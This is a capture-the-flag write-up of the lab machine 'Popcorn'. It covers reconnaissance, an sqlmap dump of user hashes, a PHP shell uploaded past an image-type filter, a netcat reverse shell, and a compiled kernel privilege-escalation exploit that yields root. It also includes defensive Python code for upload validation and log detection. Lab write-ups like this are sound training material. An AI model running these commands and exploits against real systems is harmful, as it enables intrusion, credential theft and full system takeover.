30 March 2023

Pentesting Fun Stuff

following the cyber security path…

Popcorn

Starting with port scan.

root@n0w4n:~/opt/htb/popcorn# nmap -n -A -T4 -sC -oN scan -p- 10.10.10.6
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-07 14:09 CEST
Nmap scan report for 10.10.10.6
Host is up (0.022s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_  2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open  http    Apache httpd 2.2.12 ((Ubuntu))
|_http-server-header: Apache/2.2.12 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=8/7%OT=22%CT=1%CU=35361%PV=Y%DS=2%DC=T%G=Y%TM=5B698C33
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=C4%GCD=1%ISR=CE%TI=Z%CI=Z%II=I%TS=8)OPS(O1
OS:=M54DST11NW6%O2=M54DST11NW6%O3=M54DNNT11NW6%O4=M54DST11NW6%O5=M54DST11NW
OS:6%O6=M54DST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0)ECN(R=
OS:Y%DF=Y%T=40%W=16D0%O=M54DNNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%R
OS:D=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M54DST11NW6%RD=0%Q
OS:=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A
OS:=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%D
OS:F=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL
OS:=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 993/tcp)
HOP RTT      ADDRESS
1   21.31 ms 10.10.14.1
2   21.52 ms 10.10.10.6
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.46 seconds

The scan shows port 22 (SSH) and 80 (HTTP) are open.

root@n0w4n:~/opt/htb/popcorn# gobuster -u http://10.10.10.6 -w /root/opt/SecLists/Discovery/Web-Content/raft-large-directories.txt -f -r
Gobuster v1.4.1              OJ Reeves (@TheColonial)
=====================================================
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.6/
[+] Threads      : 10
[+] Wordlist     : /root/opt/SecLists/Discovery/Web-Content/raft-large-directories.txt
[+] Status codes : 307,200,204,301,302
[+] Add Slash    : true
[+] Follow Redir : true
=====================================================
/test/ (Status: 200)
/icons/ (Status: 200)
/torrent/ (Status: 200)
/rename/ (Status: 200)
=====================================================

/rename/ gives as output:

Renamer API Syntax: index.php?filename=old_file_path_an_name&newfilename=new_file_path_and_name

/test/ gives the phpinfo page as output.

/torrent/ gives a torrent portal.

Because this is a web application, I check searchsploit for a known exploit.

root@n0w4n:~/opt/htb/celestial# searchsploit torrent hoster
--------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                 |  Path
                                                               | (/usr/share/exploitdb/)
--------------------------------------------------------------- ----------------------------------------
Torrent Hoster - Remount Upload                                | exploits/php/webapps/11746.txt
--------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

After checking the text file it looks like there is an upload vulnerability to exploit.
To reach the upload page you need to log in, so a quick registration is all it takes.

When I try to upload a PHP shell I get an error: “This is not a valid torrent file”.
Because sqlmap can take some time to run, I'm going to run it while doing some more recon.

root@n0w4n:~/opt/htb/popcorn# sqlmap -r header.txt --risk=3 --level=5 --dbms=MySQL -D torrenthoster -T users --dump
--SNIP--
+----+----------------------+---------------------+----------+----------------------------------+-----------+---------------------+
| id | email                | joined              | userName | password                         | privilege | lastconnect         |
+----+----------------------+---------------------+----------+----------------------------------+-----------+---------------------+
| 3  | admin@yourdomain.com | 2007-01-06 21:12:46 | Admin    | d5bfedcee289e5e05b86daad8ee3e2e2 | admin     | 2007-01-06 21:12:46 |
| 5  | n0w4n@mail.com       | 2018-08-07 16:40:08 | n0w4n    | 97b226b779145337eb1632fa51eb01f2 | user      | 2018-08-07 16:40:08 |
+----+----------------------+---------------------+----------+----------------------------------+-----------+---------------------+

Got my own account and the admin's. Unfortunately the admin password isn't in my wordlist, and it isn't on CrackStation either.
Let's get more info about /torrent/.

root@n0w4n:~/opt/htb/popcorn# gobuster -u http://10.10.10.6/torrent/ -w /root/opt/SecLists/Discovery/Web-Content/raft-large-directories.txt -s 200,301,307 -t 20
Gobuster v1.4.1              OJ Reeves (@TheColonial)
=====================================================
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.6/torrent/
[+] Threads      : 20
[+] Wordlist     : /root/opt/SecLists/Discovery/Web-Content/raft-large-directories.txt
[+] Status codes : 200,301,307
=====================================================
/images (Status: 301)
/admin (Status: 301)
/js (Status: 301)
/templates (Status: 301)
/css (Status: 301)
/comment (Status: 200)
/logout (Status: 200)
/login (Status: 200)
/download (Status: 200)
/lib (Status: 301)
/config (Status: 200)
/upload (Status: 301)
/database (Status: 301)
/rss (Status: 200)
/secure (Status: 200)
/users (Status: 301)
/index (Status: 200)
/preview (Status: 200)
/edit (Status: 200)
/browse (Status: 200)
/health (Status: 301)
/stylesheet (Status: 200)
/torrents (Status: 301)
/thumbnail (Status: 200)
/hide (Status: 200)
/readme (Status: 301)
/upload_file (Status: 200)
/validator (Status: 200)
/PNG (Status: 301)
=====================================================

That's some good info to have for a bit later on.
To successfully upload a torrent file I just grabbed a random one from the internet and uploaded it. When I go to the page of the upload I have the opportunity to change the logo for it. Hopefully this will give me the chance to upload a working shell script.

There is a filter that only accepts jpg, jpeg, gif and png. So I renamed my shell.php to shell.png and ran Burp to capture the POST request.
Then I changed the filename back to .php while leaving the MIME type as it was (png). Then I started a listener on my Kali box.
After that I found my upload in the /upload/ folder (as shown in the second gobuster scan).
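The bypass works because the logo upload trusts two values the client controls: the filename extension and the Content-Type of the multipart part. The check below is an added example (not the torrent hoster's code, and not from the write-up) of how an upload handler can decide from the file bytes instead; the function names, the magic-byte table and the sample inputs are all my own assumptions.

```python
import re
import secrets

# Extensions the logo upload allows according to the write-up.
ALLOWED_EXT = {"jpg", "jpeg", "gif", "png"}

# Leading bytes a genuine file of each allowed type starts with.
MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
}

# Base name without dots: blocks shell.php.png style double extensions.
SAFE_BASE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def validate_upload(filename, content_type, data):
    """Decide from the bytes, not from what the client claims.

    content_type is accepted only so the signature looks like a typical
    upload handler; it is attacker-controlled (the intercepted request kept
    image/png for a .php file) and never influences the decision.
    Returns (accepted, reason).
    """
    base, dot, ext = filename.rpartition(".")
    if not dot or not base:
        return False, "missing extension"
    if not SAFE_BASE.match(base):
        return False, "unsafe base name"
    ext = ext.lower()
    if ext not in ALLOWED_EXT:
        return False, "extension .%s not allowed" % ext
    if not any(data.startswith(m) for m in MAGIC[ext]):
        return False, "bytes do not match declared image type"
    # A structurally valid image can still carry PHP tags; if the upload
    # directory is served with PHP enabled that is enough, so refuse it too.
    if b"<?php" in data or b"<?=" in data:
        return False, "embedded PHP tag"
    return True, "ok"


def stored_name(ext):
    """Server-chosen name: the client's filename never reaches disk."""
    return "%s.%s" % (secrets.token_hex(16), ext.lower())


# Constructed sample inputs (not real uploads) for a quick self-check.
PNG_HEADER = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
PHP_TAG = b"<?php echo 'x'; ?>"

if __name__ == "__main__":
    for name, ctype, body in [
        ("shell.php", "image/png", PHP_TAG),       # the edited request from the text
        ("shell.png", "image/png", PHP_TAG),       # renamed only, still PHP inside
        ("shell.php.png", "image/png", PNG_HEADER),
        ("logo.png", "image/png", PNG_HEADER),
    ]:
        print(name, validate_upload(name, ctype, body))
```

Storing the file under a server-generated name in a directory where the web server does not execute scripts is the other half of the fix; the validator alone only closes the renamed-extension route.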

root@n0w4n:~/opt/htb/popcorn# nc -lvnp 31337
listening on [any] 31337 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.6] 59341
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux
 17:26:33 up 1 day, 10:21,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash");'
www-data@popcorn:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@popcorn:/$
www-data@popcorn:/home/george$ cat user.txt
cat user.txt
5e36a919398ecc5d5c110f2d865cf136
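From the defender's side, the shell above leaves a clear trace: a request for a .php file inside a directory that should only ever hold images and torrents. The script below is an added example (not from the write-up) that runs that rule over a few constructed Apache access-log lines; the directory list comes from the gobuster output, the log lines and the helper names are assumptions of mine.

```python
import re
from collections import namedtuple

# Apache common/combined log prefix:
# ip ident user [time] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Directories that should only hold uploaded images/torrents (from the
# second gobuster listing on this page).
UPLOAD_DIRS = ("/torrent/upload/", "/torrent/torrents/")
EXEC_EXT = (".php", ".phtml", ".php3", ".php5", ".phar")

Hit = namedtuple("Hit", "ip ts method path status reason")


def parse_line(line):
    """Return the matched fields as a dict, or None for an unparsable line."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def executable_under_upload(path):
    """True when the request path is an executable file in an upload dir."""
    p = path.split("?", 1)[0].lower()
    return p.startswith(UPLOAD_DIRS) and p.endswith(EXEC_EXT)


def scan(lines):
    """Apply the rule to every parsable line and collect the hits."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if executable_under_upload(rec["path"]):
            hits.append(Hit(rec["ip"], rec["ts"], rec["method"], rec["path"],
                            int(rec["status"]),
                            "executable file requested under upload directory"))
    return hits


def by_source(hits):
    """Count hits per client that actually succeeded (2xx): a 404 means the
    file was not there, a 200 means the server served or executed it."""
    out = {}
    for h in hits:
        if 200 <= h.status < 300:
            out[h.ip] = out.get(h.ip, 0) + 1
    return out


# Constructed sample log, not captured from the box.
SAMPLE_LOG = """\
10.10.14.3 - - [07/Aug/2018:17:20:11 +0200] "GET /torrent/index.php HTTP/1.1" 200 5123
10.10.14.3 - - [07/Aug/2018:17:24:02 +0200] "POST /torrent/upload_file.php HTTP/1.1" 200 3011
10.10.14.3 - - [07/Aug/2018:17:25:40 +0200] "GET /torrent/upload/logo.png HTTP/1.1" 200 4096
10.10.14.3 - - [07/Aug/2018:17:26:30 +0200] "GET /torrent/upload/shell.php HTTP/1.1" 200 -
10.10.14.9 - - [07/Aug/2018:17:40:12 +0200] "GET /torrent/upload/x.php HTTP/1.1" 404 -
this line is not a log entry
"""

if __name__ == "__main__":
    found = scan(SAMPLE_LOG.splitlines())
    for h in found:
        print("%s %s %s -> %d (%s)" % (h.ts, h.ip, h.path, h.status, h.reason))
    print(by_source(found))
```

The rule is deliberately narrow: it keys on where the file lives, not on its name, so a renamed shell is caught as soon as it is requested. Pairing it with a preceding POST to the upload endpoint from the same address gives the full sequence shown in this write-up.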

First flag. Now for the root flag.

www-data@popcorn:/home/george$ uname -a
uname -a
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux
www-data@popcorn:/home/george$ cat /etc/*-release
cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=9.10
DISTRIB_CODENAME=karmic
DISTRIB_DESCRIPTION="Ubuntu 9.10"

I uploaded an exploit suggester and it found some possible vulnerabilities.

www-data@popcorn:/tmp$ ./file.pl
./file.pl
  #############################
    Linux Exploit Suggester 2
  #############################
  Local Kernel: 2.6.31
  Searching among 71 exploits...
  Possible Exploits:
[+] american-sign-language
     CVE-2010-4347
     Source: http://www.securityfocus.com/bid/45408/
[+] can_bcm
     CVE-2010-2959
     Source: http://www.exploit-db.com/exploits/14814/
[+] dirty_cow
     CVE-2016-5195
     Source: https://www.exploit-db.com/exploits/40616/
[+] do_pages_move
     Alt: sieve      CVE-2010-0415
     Source: Spenders Enlightenment
[+] half_nelson
     Alt: econet      CVE-2010-3848
     Source: http://www.exploit-db.com/exploits/6851
[+] half_nelson1
     Alt: econet      CVE-2010-3848
     Source: http://www.exploit-db.com/exploits/17787/
[+] half_nelson2
     Alt: econet      CVE-2010-3850
     Source: http://www.exploit-db.com/exploits/17787/
[+] half_nelson3
     Alt: econet      CVE-2010-4073
     Source: http://www.exploit-db.com/exploits/17787/
[+] msr
     CVE-2013-0268
     Source: http://www.exploit-db.com/exploits/27297/
[+] pipe.c_32bit
     CVE-2009-3547
     Source: http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c
[+] pktcdvd
     CVE-2010-3437
     Source: http://www.exploit-db.com/exploits/15150/
[+] ptrace_kmod2
     Alt: ia32syscall,robert_you_suck      CVE-2010-3301
     Source: http://www.exploit-db.com/exploits/15023/
[+] rawmodePTY
     CVE-2014-0196
     Source: http://packetstormsecurity.com/files/download/126603/cve-2014-0196-md.c
[+] rds
     CVE-2010-3904
     Source: http://www.exploit-db.com/exploits/15285/
[+] reiserfs
     CVE-2010-1146
     Source: http://www.exploit-db.com/exploits/12130/
[+] video4linux
     CVE-2010-3081
     Source: http://www.exploit-db.com/exploits/15024/

One that quickly jumps out is the Dirty COW exploit. But because this is an older Ubuntu I want to check this first.

root@n0w4n:~/opt/htb/popcorn# searchsploit ubuntu 9.10
----------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                         |  Path
                                                                       | (/usr/share/exploitdb/)
----------------------------------------------------------------------- ----------------------------------------
Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Es | exploits/linux/local/14273.sh
Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Es | exploits/linux/local/14339.sh
ReiserFS (Linux Kernel 2.6.34-rc3 / RedHat / Ubuntu 9.10) - 'xattr' Lo | exploits/linux/local/12130.py
----------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

That looks like a nice one. It adds a temporary user toor:toor with id 0 to /etc/passwd & /etc/shadow.
I uploaded it onto popcorn but to no avail. I just can’t get it to work.

www-data@popcorn:/tmp$ bash 14339.sh
bash 14339.sh
[*] Ubuntu PAM MOTD local root
'4339.sh: line 39: syntax error near unexpected token `{
'4339.sh: line 39: `backup() {

Also just copying the code into vim isn't working either. Time for another exploit.
After a very long search and many tries the following exploit worked.
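The error output above has a recognisable shape: bash reports `syntax error near unexpected token `{` and the filename is printed as `'4339.sh` with its first character overwritten. That is what a script with CRLF line endings produces: bash reads the token as `{` followed by a carriage return, and when the message is echoed the carriage return moves the cursor back to column 0 so the closing quote lands on top of the `1`. The script below is an added example (not from the write-up) that reproduces that rendering and shows the check I would run on any transferred file before executing it; the sample script and function names are my own.

```python
def render_terminal(text):
    """Simulate how a terminal displays text containing bare carriage
    returns: CR moves the cursor to column 0 and later characters overwrite
    what is already there. Used only to reproduce the garbled error line."""
    rendered = []
    for raw in text.split("\n"):
        buf, cur = [], 0
        for ch in raw:
            if ch == "\r":
                cur = 0
                continue
            if cur < len(buf):
                buf[cur] = ch
            else:
                buf.append(ch)
            cur += 1
        rendered.append("".join(buf))
    return "\n".join(rendered)


def crlf_lines(data):
    """1-based numbers of the lines in data (bytes) that end in CRLF."""
    return [i for i, line in enumerate(data.split(b"\n"), 1)
            if line.endswith(b"\r")]


def normalize_line_endings(data):
    """Convert CRLF to LF, the same transformation dos2unix performs."""
    return data.replace(b"\r\n", b"\n")


def check_before_run(data):
    """Return (ok, message) so a transfer script can refuse to run a file
    whose line endings would break the shell."""
    bad = crlf_lines(data)
    if bad:
        return False, "CRLF line endings on lines %s; normalize first" % bad
    if data.startswith(b"#!") and b"\r" in data.split(b"\n", 1)[0]:
        return False, "carriage return in shebang line"
    return True, "ok"


# Constructed sample: a four-line shell script saved with Windows endings.
SAMPLE_SCRIPT = b"#!/bin/bash\r\nbackup() {\r\n  cp -- \"$1\" \"$1.bak\"\r\n}\r\n"

# The bash message from the transcript, with the carriage return bash
# actually emitted as part of the offending token.
BASH_MESSAGE = "14339.sh: line 39: syntax error near unexpected token `{\r'"

if __name__ == "__main__":
    print(render_terminal(BASH_MESSAGE))
    print(check_before_run(SAMPLE_SCRIPT))
    print(check_before_run(normalize_line_endings(SAMPLE_SCRIPT)))
```

`file` reporting "with CRLF line terminators", as searchsploit does for 15704.c further down, is the same signal; `sed -i 's/\r$//' script.sh` or `dos2unix` on the receiving side fixes it before the first run.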

www-data@popcorn:/tmp$ nc -lp 9999 > file.c
nc -lp 9999 > file.c
root@n0w4n:~/opt/htb/popcorn# searchsploit -p 15704
  Exploit: Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/15704/
     Path: /usr/share/exploitdb/exploits/linux/local/15704.c
File Type: C source, ASCII text, with CRLF line terminators
Copied EDB-ID #15704's path to the clipboard.
root@n0w4n:~/opt/htb/popcorn# nc -w3 10.10.10.6 9999 < /usr/share/exploitdb/exploits/linux/local/15704.c
www-data@popcorn:/tmp$ nc -lp 9999 > file.c
nc -lp 9999 > file.c
www-data@popcorn:/tmp$ gcc file.c -o file
gcc file.c -o file
www-data@popcorn:/tmp$ ./file
./file
[*] Resolving kernel addresses...
 [+] Resolved econet_ioctl to 0xf8415280
 [+] Resolved econet_ops to 0xf8415360
 [+] Resolved commit_creds to 0xc01645d0
 [+] Resolved prepare_kernel_cred to 0xc01647d0
[*] Calculating target...
[*] Triggering payload...
[*] Got root!
# id
id
uid=0(root) gid=0(root)
# cat /root/root.txt
cat /root/root.txt
f122331023a9393319a0370129fd9b14

After all this trouble I checked some write-ups from others and noticed that my original attempt was the right one. But I can't figure out why the scripts got busted during the transfer.
Maybe my choice of reverse shell had some drawbacks, but I need to follow up on that next time.
